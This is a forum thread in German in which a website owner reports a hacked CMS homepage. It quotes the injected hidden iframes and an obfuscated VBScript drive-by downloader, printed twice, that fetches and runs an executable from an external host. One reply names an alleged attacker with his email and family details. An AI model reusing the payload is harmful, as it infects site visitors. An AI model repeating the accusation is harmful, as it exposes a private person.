Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Homepage gehackt wurden?

Frage Sicherheit Erkennung und -Abwehr

Mitglied: Casanitto

Casanitto (Level 1) - Jetzt verbinden

08.09.2007, aktualisiert 09.09.2007, 4178 Aufrufe, 2 Kommentare

Hallo,

Seit heute kann ich mich nicht mehr in meine Homepage einloggen, benutze Webspell als CMS.
Er sagt mir zwar das ich korrekt eingeloggt bin, abba dann bei der nächsten Seite sagt er das ich eingeloggt sein muss um die Webseite zusehen!
Habe dann mal geschaut im Quelltext und da steht dann das hier:

01.
 <IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
02.
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
03.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
Das ist aber nicht von mir!
Wenn man diese Webseite aufruft kommt folgendes :
01.
<script language="JavaScript"> 
02.
<!-- 
03.
 
04.
function SymError() 
05.
06.
  return true; 
07.
08.
 
09.
window.onerror = SymError; 
10.
 
11.
var SymRealWinOpen = window.open; 
12.
 
13.
function SymWinOpen(url, name, attributes) 
14.
15.
  return (new Object()); 
16.
17.
 
18.
window.open = SymWinOpen; 
19.
 
20.
//--> 
21.
</script> 
22.
 
23.
<script language="JavaScript"> 
24.
<!-- 
25.
 
26.
function SymError() 
27.
28.
  return true; 
29.
30.
 
31.
window.onerror = SymError; 
32.
 
33.
var SymRealWinOpen = window.open; 
34.
 
35.
function SymWinOpen(url, name, attributes) 
36.
37.
  return (new Object()); 
38.
39.
 
40.
window.open = SymWinOpen; 
41.
 
42.
//--> 
43.
</script> 
44.
 
45.
<SCRIPT LANGUAGE="VBS"><!-- 
46.
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu" 
47.
s="" 
48.
For i=1 To Len(d) 
49.
b=Mid(d,i,1) 
50.
a=Asc(b) 
51.
If a=1 Then a=9 
52.
If a=2 Then a=10 
53.
If a=3 Then a=13 
54.
If a=4 Then a=34 
55.
If a<=31 And a>=14 Then 
56.
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4) 
57.
i=i+2 
58.
Else 
59.
if a>=41 and a<=127 then a=a-1 
60.
if a <127 then s=s+Chr(a) else s=s+b 
61.
End If 
62.
Next 
63.
document.write s 
64.
 
65.
--></SCRIPT> 
66.
<script language="JavaScript"> 
67.
<!-- 
68.
var SymRealOnLoad; 
69.
var SymRealOnUnload; 
70.
 
71.
function SymOnUnload() 
72.
73.
  window.open = SymWinOpen; 
74.
  if(SymRealOnUnload != null) 
75.
     SymRealOnUnload(); 
76.
77.
 
78.
function SymOnLoad() 
79.
80.
  if(SymRealOnLoad != null) 
81.
     SymRealOnLoad(); 
82.
  window.open = SymRealWinOpen; 
83.
  SymRealOnUnload = window.onunload; 
84.
  window.onunload = SymOnUnload; 
85.
86.
 
87.
SymRealOnLoad = window.onload; 
88.
window.onload = SymOnLoad; 
89.
 
90.
//--> 
91.
</script> 
92.
 
93.
 
94.
<script language="JavaScript"> 
95.
<!-- 
96.
var SymRealOnLoad; 
97.
var SymRealOnUnload; 
98.
 
99.
function SymOnUnload() 
100.
101.
  window.open = SymWinOpen; 
102.
  if(SymRealOnUnload != null) 
103.
     SymRealOnUnload(); 
104.
105.
 
106.
function SymOnLoad() 
107.
108.
  if(SymRealOnLoad != null) 
109.
     SymRealOnLoad(); 
110.
  window.open = SymRealWinOpen; 
111.
  SymRealOnUnload = window.onunload; 
112.
  window.onunload = SymOnUnload; 
113.
114.
 
115.
SymRealOnLoad = window.onload; 
116.
window.onload = SymOnLoad; 
117.
 
118.
//--> 
119.
</script>
Kann mir von euch vielleicht jemand sagen was das sein soll?

Gruss Casanitto
Mitglied: thekingofqueens
08.09.2007 um 22:27 Uhr
Provider informieren, Backup des Contents machen, alles löschen und von vorne anfangen.
Bitte warten ..
Mitglied: gnarff
09.09.2007 um 02:09 Uhr
Zu den Codesnippet:
1: Ein Scriptblocker
2. Geblockt wurde folgendes Script:
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

Wenn Du wissen willst was Alvarez auf Deiner HP wollte oder dich gar beschweren moechtest, so kannst Du das direkt bei Ihm tun alvarezluque@arnet.com.ar, sein Vater ist Sekretaer des Rotary Clubs in Corrientes, Argentinien, sein voller Name ist Augusto Alvarez Luque, Dipl. Informatiker,
saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
Rechtliche Fragen
gelöst Microsoftkonto wurde gehackt - Liegt das Problem direkt bei Microsoft? (7)

Frage von Stefan007 zum Thema Rechtliche Fragen ...

Batch & Shell
gelöst Abfrage ob Daten eingegeben wurden (5)

Frage von Floki1 zum Thema Batch & Shell ...

Linux Desktop
Webseite aufgerufen - Linux gehackt (5)

Link von BirdyB zum Thema Linux Desktop ...

Erkennung und -Abwehr
Adult Friend Finder: 412 Milionen Accounts von Datingseite gehackt (3)

Link von Frank zum Thema Erkennung und -Abwehr ...

Heiß diskutierte Inhalte
Router & Routing
Tipps für Router (ca. 100 clients, VPN) (18)

Frage von oel-auge zum Thema Router & Routing ...

TK-Netze & Geräte
gelöst Convert von TAPI auf CAPI gesucht (13)

Frage von StefanKittel zum Thema TK-Netze & Geräte ...